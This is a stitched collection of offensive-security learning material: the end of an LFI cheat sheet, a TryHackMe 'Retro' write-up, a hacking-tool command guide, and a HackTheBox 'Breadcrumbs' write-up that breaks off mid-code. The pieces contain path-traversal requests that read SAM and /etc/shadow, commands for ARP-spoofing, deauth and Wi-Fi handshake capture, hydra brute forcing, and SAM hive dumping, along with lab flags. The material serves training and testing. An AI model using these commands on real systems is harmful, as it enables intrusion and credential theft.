login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` ## LFI to RCE via credentials files This method require high privileges inside the application in order to read the sensitive files. ### Windows version First extract `sam` and `system` files. ```powershell http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam http://example.com/index.php?page=../../../../../../WINDOWS/repair/system ``` Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. ### Linux version First extract `/etc/shadow` files. ```powershell http://example.com/index.php?page=../../../../../../etc/shadow ``` Then crack the hashes inside in order to login via SSH on the machine. ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [Turning LFI to RFI](https://l.avala.mp/?p=241) * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html) * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/) * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html) * [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html) * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017) * [ะงั‚ะตะฝะธะต ั„ะฐะนะปะพะฒ => unserialize !](https://rdot.org/forum/showthread.php?t=4379) * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) * [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1)
# Retro New high score! [Retro](https://tryhackme.com/room/retro) ## Topic's - Network Enumeration - Web Enumeration - Web Poking - CVE-2017-0213 - Windows COM Aggregate Marshaler/IRemUnknown2 ## Appendix archive Password: `1 kn0w 1 5h0uldn'7!` ## Pwn Can you time travel? If not, you might want to think about the next best thing. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. --- There are two distinct paths that can be taken on Retro. One requires significantly less trial and error, however, both will work. Please check writeups if you are curious regarding the two paths. An alternative version of this room is available in it's remixed version Blaster. ``` kali@kali:~/CTFs/tryhackme/Retro$ sudo nmap -A -p- -sC -sV -Pn 10.10.222.128 [sudo] password for kali: Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-04 09:46 CEST Nmap scan report for 10.10.222.128 Host is up (0.039s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: RETROWEB | NetBIOS_Domain_Name: RETROWEB | NetBIOS_Computer_Name: RETROWEB | DNS_Domain_Name: RetroWeb | DNS_Computer_Name: RetroWeb | Product_Version: 10.0.14393 |_ System_Time: 2020-10-04T07:51:25+00:00 | ssl-cert: Subject: commonName=RetroWeb | Not valid before: 2020-10-03T07:44:58 |_Not valid after: 2021-04-04T07:44:58 |_ssl-date: 2020-10-04T07:51:26+00:00; +3m07s from scanner time. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016 (89%), FreeBSD 6.X (85%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:freebsd:freebsd:6.2 Aggressive OS guesses: Microsoft Windows Server 2016 (89%), FreeBSD 6.2-RELEASE (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 3m06s, deviation: 0s, median: 3m06s TRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 38.93 ms 10.8.0.1 2 38.96 ms 10.10.222.128 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 133.01 seconds ``` 1. A web server is running on the target. What is the hidden directory which the website lives on? ``` kali@kali:~/CTFs/tryhackme/Retro$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.222.128 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.222.128 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/10/04 09:50:53 Starting gobuster =============================================================== /retro (Status: 301) Progress: 31140 / 220561 (14.12%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2020/10/04 09:53:15 Finished =============================================================== ``` `/retro` - [One Comment on โ€œReady Player Oneโ€](http://10.10.222.128/retro/index.php/2019/12/09/ready-player-one/#comment-2) ![](2020-10-04_09-54.png) - `wade` - `parzival` 2. user.txt ![](2020-10-04_09-57.png) `3b99fbdc6d430bfb51c72c651a261927` 3. root.txt ``` kali@kali:~/CTFs/tryhackme/Retro$ unzip CVE-2017-0213_x64.zip Archive: CVE-2017-0213_x64.zip inflating: CVE-2017-0213_x64.exe kali@kali:~/CTFs/tryhackme/Retro$ sudo python3 -m http.server 80 [sudo] password for kali: Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.222.128 - - [04/Oct/2020 10:11:22] "GET / HTTP/1.1" 200 - 10.10.222.128 - - [04/Oct/2020 10:11:22] code 404, message File not found 10.10.222.128 - - [04/Oct/2020 10:11:22] "GET /favicon.ico HTTP/1.1" 404 - 10.10.222.128 - - [04/Oct/2020 10:11:34] "GET /CVE-2017-0213_x64.exe HTTP/1.1" 200 - ``` ![](2020-10-04_10-14.png) `7958b569565d7bd88d10c6f22d1c4063`
# Introduction to Hacking Library The goal of this library is to create an archive of useful tools and how to use them, mostly for: - Hacking - Pentests - Security Remember, this is only a guide, use the knowledge here wisely and at your own risk. Have fun! # Analysis Websites ## IPOK A colection of online tools for analysis and diagnoses in domains, dns, email, network and servers. - https://ipok.com.br/ ## Have I Been Pwned A site that checks if your email or phone is in a data breach. - https://haveibeenpwned.com/ ## How secure is my password? A site that displays how secure is a password measured in time to crack it. - https://www.security.org/how-secure-is-my-password/ # Cryptography ## Steghide Steghide is steganography program which hides bits of a data file in some of the least significant bits of another file in such a way that the existence of the data file is not visible and cannot be proven. It is designed to be portable and configurable and features hiding data in bmp, jpeg, wav and au files, blowfish encryption, MD5 hashing of passphrases to blowfish keys, and pseudo-random distribution of hidden bits in the container data. **Hiding a file in an image:** ```console steghide embed -cf {IMAGE} -ef {FILE_NAME} ``` Example: ```console steghide embed -cf image.jpg -ef secret.txt ``` **Recovering text in an image:** ```console steghide extract -sf {IMAGE} ``` Example: ```console steghide extract -sf image.jpg ``` #### How to install ```console sudo apt install steghide ``` # Hash Cracking ## Websites for crashing Hashs - https://www.onlinehashcrack.com/ - https://hashes.com/ ## Ophcrack Password cracker designed for all operating systems that specializes in Windows password cracking. It works by using rainbow tables to try to crack the password. After downloaded only open the program, add the LM/NT Hashes, add the rainbow tables that you have downloaded and click in start. Not always it will find the key, but its certainly faster than other methods. #### How to install Download the program here: https://ophcrack.sourceforge.io/ And download rainbow tables here: https://ophcrack.sourceforge.io/tables.php ## John the Ripper ## Hashcat # Wordlist creation List of scripts to help creating wordlists. ## CeWL (Custom Word List generator) CeWL is a ruby app which spiders a given URL, up to a specified depth, and returns a list of words which can then be used for password crackers such as John the Ripper. ```console cewl -w {FILE_TO_WRITE_PASSWORD} -d {DEPTH_NUM} -m {MINIMUM_PASSWORD_LENGTH} {IP_ADDRESS} ``` Example: ```console cewl -w passwords.txt -d 2 -m 5 192.168.15.99 ``` #### How to install ```console sudo apt install cewl ``` #### Flags - Let the spyder visit other sites: > -o - Lowercase all parsed words > --lowercase - Include email address: > -e - Output file for email addresses: > --email_file {FILE_NAME} - Show the count for each word found: > -c ## Crunch The wordlists are created through combination and permutation of a set of characters. You can determine the amount of characters and list size. ```console crunch {MIN_WORD_SIZE} {MAX_WORD_SIZE} {CHARACTER_LIST} > {FILE_TO_SAVE_WORDLIST} ``` Example: ```console crunch 3 4 qwerty123 > wordlist.txt ``` #### How to install ```console sudo apt install crunch ``` ## Cupp Cupp is an interactive program that permutate the info gathered to create a wordlist. ```console python3 cupp.py -i ``` #### How to install Download the cupp repository at: - https://github.com/Mebus/cupp # Analysis Tools ## ARP The ARP protocol (Address Resolution Protocol) associates every MAC address with an IP address in the local network. The way this works is with a broadcast in the local network, asking every host about their pairs IP/MAC. Every time a broadcast occurs the host sends his own pair IP/MAC besides asking other hosts their pairs, so it can be saved into a cache in every machine. You can check the ARP cache in your own machine with: ```console arp -a ``` Using ARP protocol you can either scan your local network to discover hosts, revealing their MAC addresses and internet adapter manufacturer: ```console sudo arp-scan --interface=eth0 --localnet ``` or try to guess the OS of the hosts with: ```console sudo arp-fingerprint -l ``` ## TCPDUMP TCPDUMP is a network analysis tool, it can be used for example with ARP Spoofing man in the middle, to analyze the traffic between host and victim. - Base command: ```console tcpdump -i eth0 ``` #### Flags Use the flags after the base command - Traffic going in/out some IP: > host {IP_ADDRESS} - Filter traffic by entry or exit: > src {IP_ADDRESS} > dst {IP_ADDRESS} - Filter traffic by port: > port {PORT_NUM} > portrange {PORT_START}-{PORT_END} - Filter by package size: > less {SIZE} > greater {SIZE} > <= {SIZE} - Save to file: > -w {FILE_NAME} - Read file: > -r {FILE_NAME} ## Wireshark Wireshark is mostly used as an Sniffing tool to analise protocols when the computer send or receive packages, it can also be used with a Man in the Middle attack to analyze the traffic between host and victim. #### Important Filters Note that what is written here are only examples and not all the possibilities. So you can combine them and create your own filters based on your needs. - Filters packages sent or received by an IP address. Useful for analizing an especific computer: > ip.addr==192.168.0.1 - Filters only the packages that this IP has sent: > ip.src==192.168.0.1 - Filters only the packages that this IP will receive: > ip.dst==192.168.0.1 - Filters tcp packages by an especific port. Useful when filtering the communication of an specific service: > tcp.port==xxx - Filters tcp packages that cointains the term "google.com": > tcp contains google.com - Filters by udp protocol or tcp protocol: > udp or - Filters all dns packages: > dns - Filters all http packages: > http - Filters all HTTP GET and POST requests. It can show the most accessed webpages: > http.request - Filter http packages that contain the term .doc > http contains .doc - Filter http packages sent by the host: > http.host - Filter http packages sent by the server: > http.server - Displays all packets that contain the word โ€˜trafficโ€™. Excellent when searching on a specific string or user ID: > frame contains traffic - Service that provides mutual authentication between users and services in a network. Useful for finding logins: > kerberos ## Nmap ```console nmap {IP_ADDRESS} ``` Example: ```console nmap 192.168.1.* ``` #### Ports state The ports can be classified in 3 states: - **Open** - Port is open accepting TCP conections or UDP packages. - **Closed** - Port is closed but answers to Nmap packages, but there's no application listening to it. - **Filtered** - Nmap doesn't know if is open or closed, because there's a package filter that don't let Nmap packages to reach the port. #### Flags - Port selection: > -p 22,80-85,443,8000-8005,8080-8085 - Know port selection: > -p ssh - Agressive scan: > -T5 - Discreet scan: > -T0 - Save to file: > -oN {FILENAME} - Randomizes the port scan order by default to make detection slightly harder: > -r - Skip the ping test and simply scan every target host provided (helps finding hidden hosts): > -Pn - Display open TCP ports: > -sT - Display open UCP ports: > -sU - Display target system infos: > -A - Display target OS: > -O - Display version of services running in the ports: > -sV - Find vulnerabilities: > --script vuln - Find malwares or backdoors: > --script malware ## Telnet Telnet can be used to get the name and version of a process running in a specific port ```console telnet {IP_ADDRESS} {PORT} ``` Example: ```console telnet 192.168.1.1 22 ``` ## Nikto Nikto is used to find vulnerabilities on web servers. ```console nikto -host {IP_ADDRESS_OR_WEBSITE_DOMAIN} {OPTIONS} ``` Example: ```console nikto -h 192.168.15.1 -Display 1 ``` #### Options - Show redirects: > -Display 1 - Show cookies received: > -Display 2 - Show all 200/OK responses: > -Display 3 - Show URLs that need autentication: > -Display 4 - Show debugging log: > -Display D - Show more detailed infos: > -Display V ##### Scan tuning for Nikto: - File upload: > -Tuning 0 - Interesting File / Seen in logs: > -Tuning 1 - Misconfiguration / Default File: > -Tuning 2 - Information Disclosure: > -Tuning 3 - Injection (XSS/Script/HTML): > -Tuning 4 - Remote File Retrieval - Inside Web Root: > -Tuning 5 - DOS (Denial Of Service): > -Tuning 6 - Remote File Retrieval - Server Wide: > -Tuning 7 - Remote shell / Command execution: > -Tuning 8 - SQL injection: > -Tuning 9 - Authentication Bypass: > -Tuning a - Software identification: > -Tuning b - Remote font inclusion: > -Tuning c - WebService: > -Tuning d - Administrative Console: > -Tuning e ## NSLookup Shows DNS servers of some website domain ```console nslookup {WEBSITE_DOMAIN} ``` Example: ```console nslookup www.google.com ``` ## Webtech Show tecnologies used in a webserver. ```console ./.local/bin/webtech -u {WEBSITE_DOMAIN} ``` Example: ```console ./.local/bin/webtech -u http://www.google.com ``` #### How to install > pip install webtech ## WAF Checks for WAF (Web Application FIrewall): ```console wafw00f -a -v {WEBSITE_DOMAIN} ``` Example: ```console wafw00f -a -v http://www.google.com ``` # Attack Tools ## ARP Spoofing The objective of this attack is to add/replace some entries in the ARP table making the router believe that the attacker is in reality the victim and making the victim believe that the attacker is the router. ![ARP Spoofing Image](/img/ARP%20Spoofing.png) ### Enabling fowarding First you need to enable fowarding of packets so the victim doesn't know that something happened. ___ #### Temporary fowarding For temporary fowarding (this will disable fowarding when the machine is rebooted): ```console sudo sysctl -w net.ipv4.ip_forward=1 ``` or ```console sudo echo 1 > /proc/sys/net/ipv4/ip_forward ``` ___ #### Permanent fowarding ```console sudo nano /etc/sysctl.conf ``` then find the line: ``` #Uncomment the next line to enable packet forwarding for IPv4 #net.ipv4.ip_forward=1 ``` and delete the "#" in the second line: ``` #Uncomment the next line to enable packet forwarding for IPv4 net.ipv4.ip_forward=1 ``` then > Ctrl o > Enter > Ctrl x and finally run this to apply the changes: ```console sudo sysctl -p /etc/sysctl.conf ``` ### Making a man in the middle with Arpspoof To make this we will use this command two times: ```console sudo arpspoof -i {NETWORK_INTERFACE} -t {TARGET_IP} {IP_YOU_WILL_BE_PRETENDING_TO_BE} ``` ___ #### First terminal First to make the router think that our machine is the victim: ```console sudo arpspoof -i {NETWORK_INTERFACE} -t {ROUTER_IP} {VICTIM_IP} ``` Example: ```console sudo arpspoof -i eth0 -t 192.168.0.1 192.168.0.104 ``` ___ #### Second terminal Then we make the victim think that our machine is the router: ```console sudo arpspoof -i {NETWORK_INTERFACE} -t {VICTIM_IP} {ROUTER_IP} ``` Example: ```console sudo arpspoof -i eth0 -t 192.168.0.104 192.168.0.1 ``` and with this we have a man in the middle set. ## Hydra Password Cracking Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. ```console hydra -L {USER_LIST_FILE} -P {PASSWORD_LIST_FILE} {IP_ADDRESS} {PROTOCOL} ``` or ```console hydra -l {USERNAME} -p {PASSWORD} {IP_ADDRESS} {PROTOCOL} ``` Example: ```console hydra -l admin -P passwords.txt 192.168.15.99 ssh ``` #### Flags - Restore a previous aborted/crashed session: > -R - Ignore an existing restore file (don't wait 10 seconds): > -I - Perform an SSL connect: > -S - If the service is on a different default port, define it here: > -s {PORT} - Login with LOGIN name, or load several logins from FILE: > -l {LOGIN} > -L {FILE} - Try password PASS, or load several passwords from FILE > -p {PASS} > -P {FILE} #### How to install ```console sudo apt install hydra ``` ## Burp Suite ## Windows local password cracking Cracking a Windows password is a three-step process: 1. Acquiring the crypted password files 2. Uncrypting them 3. Cracking the Hashes As an overview the method presented here starts by getting the files that hold the passwords hashes encrypted, then uncrypt them with Samdump2 getting the Hashes, and finally trying ways to crack this Hashes. #### Getting SAM and SYSTEM files Windows password hashes are stored in the SAM (Security Accounts Manager) file, however, they are encrypted with the system boot key, which is stored in the SYSTEM file. If we get access to both of these files, then the SYSTEM file can be used to decrypt the password hashes stored in the SAM file. They are in this directory: windows/system32/config . Unfornately this directory isn't accessible when Windows is running, so to get them you need to use some commands: > reg save hklm\sam c:\sam > reg save hklm\system c:\system #### Getting password hashes with Samdump2 After you have both files we run Samdump2 to decrypt and get the Hashes. ```console samdump2 -o {OUTPUT_FILE} {SYSTEM_FILE} {SAM_FILE} ``` Example: ```console samdump2 -o hashes.txt SYSTEM SAM ``` The hashes you will get will be in this format: > {USER}:{USER_ID}:{LM_HASH}:{NT_HASH}::: For example: > Maulem:1004:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f::: The LM Hash is older and easier to crack but sometimes (like this example) its value is an empty string which means we cannot use it to get the password. The NT Hash (or NTLM in some cracking websites) is newer and more difficult to crash, but if cracking the LM didn't work this hash is the way. #### Cracking the Hashes There are a lot of ways to crack the Hashes, this Hashes are LM or NT (or NTLM) and can be cracked with: - [Online Hash Cracking](#websites-for-crashing-hashs) - [Ophcrack (Specialized in windows password cracking)](#ophcrack) - [John the Ripper](#john-the-ripper) - [Hashcat](#hashcat) ## WI-fi password cracking Basically the process to crack wi-fi passwords consists in two parts, first you need to capture the wi-fi handshake from a device that has the password and then you need to crack the hash provenient from the handshake. In this guide we will use Airmon tools to capture the Handshake and then there are a lot of tools for cracking the hashes. #### Setting up Wlan interfaces For this to work you need a Wlan interface to capture the Handshake, that means that if your PC only get internet through cable this won't work. To show your interfaces use this command: ```console iwconfig ``` ![Wlan Interfaces Image](/img/Wlan%20Interfaces.png) You should have at least one interface, named like wlan0 or wlan1. In the next step if you use the interface that is connected to the internet you will **lose your internet connection until you restart the computer**, so if you only have 1 wlan interface you will need an ethernet cable to have connection to the internet. To start searching for networks using your interface: ```console sudo airmon-ng start {WLAN_INTERFACE_NAME} ``` For example: ```console sudo airmon-ng start wlan0 ``` If you see a message that says "Found processes that could cause trouble," run this to kill them: ```console sudo airmon-ng check kill ``` Now if you run this command again it should show that the interface mode is now at Monitor mode and not in Managed mode ```console iwconfig ``` ![Wlan Managed Mode Image](/img/Wlan%20managed%20mode.png) #### Discovering networks in your area To discover 2.4G networks near you use this command (note that the Wlan interface name should have changed after the activation of the Monitor mode) ```console sudo airodump-ng {WLAN_INTERFACE_MONITOR_NAME} ``` For example: ```console sudo airodump-ng wlan0mon ``` To discover all networks including 5G near you use this command ```console sudo airodump-ng --band ab {WLAN_INTERFACE_MONITOR_NAME} ``` For example: ```console sudo airodump-ng --band ab wlan0mon ``` The disadvantage of discovering all networks instead the default ones is that your machine looks in more than 170 channels instead of 15 and this takes a lot more time to refresh th same network again. Note that to get handshakes through 5G you will need to really be near the router. #### Focusing on one network Now that you have seen the networks in your area you need to choose one and get its BSSID and CH (channel). Note that networks with lower values of PWR (power) means that the network is too far away and that lowers the possibilities to get a Handshake, try to pick the nearest network to -1 PWR or try walking near the router (the PWR value will increase). In my experience the minimum power that i could get a handshake was -60 PWR and took over 2 days. This command focus on a network, the -c (channel) is not mandatory neither --output-format but it helps on what we are trying to do: ```console sudo airodump-ng -c {CHANNEL_NUM} -w {FILE_NAME} --output-format pcap -d {NETWORK_BSSID} {WLAN_INTERFACE_MONITOR_NAME} ``` For example: ```console sudo airodump-ng -c 6 -w cap --output-format pcap -d 98:7E:CA:AE:A9:DF wlan0mon ``` This command is the same in 2.4G and 5G networks, just watch that the same network has different BSSIDs for 2.4G and 5G. ![Capturing Handshake Image](/img/Capturing%20Handshake.png) After running this command you should see something like this, the first part (1) show infos about the network that we are focusing, if no infos appear it means that either the network is off or the channel is wrong. A bug that i noticed is that the infos about some networks disappear after some time, the way that i supressed this was to not set an especific channel to focus. The second part (2) show devices that are connected to the network, to capture a handshake either a new device (that has the password) can connect to the network or a connected device can disconnect and connect again. You can passively wait for the handshake or you can try to disconnect devices from the network to capture the handshakes when they connect again, but this is risky because you can be detected by others doing it. Also a lot of routers have security measures against deauthentication attacks nowadays. [How to do a Deauth attack](#deauth-attack) ![Handshake Captured Image](/img/Handshake%20Captured.png) After capturing the handshake something like this (1) should appear in the terminal. If appear a PMKID instead of a Handshake it means that you are lucky because even without any users connecting to the network the Aircrack managed to get a PMKID that can be used to crack the password without the need of a handshake, in this case you need to extract the PMKID from the .cap file using hcxtool: ```console hcxpcaptool -z {FILE_TO_SAVE_HASH_FROM_PMKID} {CAP_FILE} ``` For example: ```console hcxpcaptool -z pmkid_hash.txt cap.cap ``` #### Cracking the password from the Handshake/PMKID These tools can help you to crack Handshakes or PMKIDs: - [Online Hash Cracking](#websites-for-crashing-hashs) - [John the Ripper](#john-the-ripper) - [Hashcat](#hashcat) ## Deauth Attack The deauthentication attack tries to disconnect a user or all the users of a network, but it can be detected and a lot of routers have security measures against this kind of attack nowadays. To try to hide your presence and not be detected by the security mecanisms the best is to set a number of tries (leaving in at 0 tries infinite times) and try to attack only one device at time. #### Disconecting a device Note that the device BSSID can be found when [focusing on a network with airdump](#focusing-on-one-network), below "STATION" column. ```console sudo aireplay-ng -0 {NUMBER OF TRIES} -a {NETWORK_BSSID} -c {DEVICE_BSSID} {WLAN_INTERFACE_MONITOR_NAME} ``` For example: ```console sudo aireplay-ng -0 20 -a 86:7E:CA:AE:A9:DE -c D4:F4:6F:C6:BE:2B wlan0mon ``` #### Disconecting all devices ```console sudo aireplay-ng -0 {NUMBER OF TRIES} -a {NETWORK_BSSID} {WLAN_INTERFACE_MONITOR_NAME} ``` For example: ```console sudo aireplay-ng -0 0 -a 86:7E:CA:AE:A9:DE wlan0mon ```
# Breadcrumbs - HackTheBox - Writeup Windows, 40 Base Points, Hard ## Machine ![โ€โ€Breadcrumbs.JPG](images/Breadcrumbs.JPG) ## Breadcrumbs Solution ### User 1 Let's start with ```nmap``` scanning: ```console โ”Œโ”€[evyatar@parrot]โ”€[/hackthebox/Breadcrumbs] โ””โ”€โ”€โ•ผ $ nmap -sC -sV -oA nmap/Breadcrumbs 10.10.10.228 Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-25 18:12 IDT Nmap scan report for 10.10.10.228 Host is up (0.083s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0) | ssh-hostkey: | 2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA) | 256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA) |_ 256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519) 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1 |_http-title: Library 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.1 |_http-title: Library | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds? 3306/tcp open mysql? | fingerprint-strings: | NULL: |_ Host '10.10.14.21' is not allowed to connect to this MariaDB server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.80%I=7%D=6/25%Time=60D5F286%P=x86_64-pc-linux-gnu%r(NU SF:LL,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.14\.21'\x20is\x20not\x20allow SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 4m18s | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-06-25T15:17:40 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 33.21 seconds ``` Let's try to observe on port 80: ![port80.JPG](images/port80.JPG) By click on the button we get the following webpage [http://10.10.10.228/php/books.php](http://10.10.10.228/php/books.php): ![books.JPG](images/books.JPG) Let's intrecept the request using [BurpSuite](https://portswigger.net/burp), Just insert for title "t" and for author "a": ![intercept.JPG](images/intercept.JPG) By changing the request body from ```title=t&author=a&method=0``` to ```title=t&author=a&method=1``` we got the following response: ![method1.JPG](images/method1.JPG) As we can see from the error message - where ```method=1``` we need to add another parameter called ```book``` and according the error: >file_get_contents(../books/): Failed to open stream: No such file or directory in C:\Users\www-data\Desktop\xampp\htdocs\includes\bookController.php We know that It's looking for file name of book that located on ```../books```. If we send the following request ```book=book3.html&method=1``` we get the following response: ![book1.JPG](images/book1.JPG) So It's mean we are able to read files from server ([LFI](https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/)). Let's try to send the following request body ```book=../includes/bookController.php&method=1``` to read the current webpage: ![bookcont.JPG](images/bookcont.JPG) And we just get the following code: ```php <? php if($_SERVER['REQUEST_METHOD'] == "POST"){ $out = ""; require '../db/db.php'; $title = ""; $author = ""; if($_POST['method'] == 0){ if($_POST['title'] != ""){ $title = "%".$_POST['title']."%"; } if($_POST['author'] != ""){ $author = "%".$_POST['author']."%"; } $query = "SELECT * FROM books WHERE title LIKE ? OR author LIKE ?"; $stmt = $con->prepare($query); $stmt->bind_param('ss', $title, $author); $stmt->execute(); $res = $stmt->get_result(); $out = mysqli_fetch_all($res,MYSQLI_ASSOC); } elseif($_POST['method'] == 1){ $out = file_get_contents('../books/'.$_POST['book']); } else{ $out = false; } echo json_encode($out); } ``` ```gobuster``` also give us [http://10.10.10.228/portal/login.php](http://10.10.10.228/portal/login.php): ![portal.JPG](images/portal.JPG) By login to the portal we get the following page: ![portallogged.JPG](images/portallogged.JPG) The intersing page is [File Managment](http://10.10.10.228/portal/php/files.php). By reading the source code of File Managment page (Using LFI) we can see the following code: ```php <?php session_start(); $LOGGED_IN = false; if($_SESSION['username'] !== "paul"){ header("Location: ../index.php"); } if(isset($_SESSION['loggedIn'])){ $LOGGED_IN = true; require '../db/db.php'; } else{ header("Location: ../auth/login.php"); die(); } ?> <html lang="en"> <head> <title>Binary</title> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script> <link rel="stylesheet" type="text/css" href="../assets/css/main.css"> <link rel="stylesheet" type="text/css" href="../assets/css/all.css"> </head> <nav class="navbar navbar-default justify-content-end"> <div class="navbar-header justify-content-end"> <button type="button" class="navbar-toggle btn btn-outline-info p-3 m-3" data-toggle="collapse" data-target=".navbar-collapse"><i class="fas fa-hamburger"></i></button> </div> <div class="collapse navbar-collapse justify-content-end mr-5"> <ul class="navbar-nav"> <li class="nav-item"><a class="nav-link text-right" href="../index.php"><i class="fas fa-home"></i> Home</a></li> <li class="nav-item"><a class="nav-link text-right" href="issues.php"><i class="fa fa-check" aria-hidden="true"></i> Issues</a></li> <li class="nav-item"><a class="nav-link text-right" href="users.php"><i class="fa fa-user" aria-hidden="true"></i> User Management</a></li> <li class="nav-item"><a class="nav-link text-right" href="#"><i class="fa fa-file" aria-hidden="true"></i> File Management</a></li> <li class="nav-item"><a class="nav-link text-right" href="../auth/logout.php"><i class="fas fa-sign-out-alt"></i> Logout</a></li> </ul> </div> </nav> <body class="bg-dark"> <main class="main"> <div class="row justify-content-center text-white text-center"> <div class="col-md-3"> <h1>Task Submission</h1> <p class="text-danger"><i class="fas fa-exclamation-circle"></i> Please upload only .zip files!</p> <form onsubmit="return false"> <div class="form-group mt-5"> <input type="text" class="form-control" placeholder="Task completed" id="task" name="task"> </div> <div class="form-group"> <input type="file" class="form-control" placeholder="Task" id="file" name="file"> </div> <button type="submit" class="btn btn-outline-success btn-block py-3" id="upload">Upload</button> </form> <p id="message"></p> </div> </div> </div> </main> <?php include "../includes/footer.php"; ?> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-ho+j7jyWK8fNQe+A12Hb8AhRq26LrZ/JpcUGGOn+Y7RsweNrtN/tE3MoK7ZeZDyx" crossorigin="anonymous"></script> <script type="text/javascript" src='../assets/js/files.js'></script> </body> </html> ``` We are able to upload files to web server, But we can access this web page only if we are logged in as ```paul``` user: ```php ... if($_SESSION['username'] !== "paul"){ 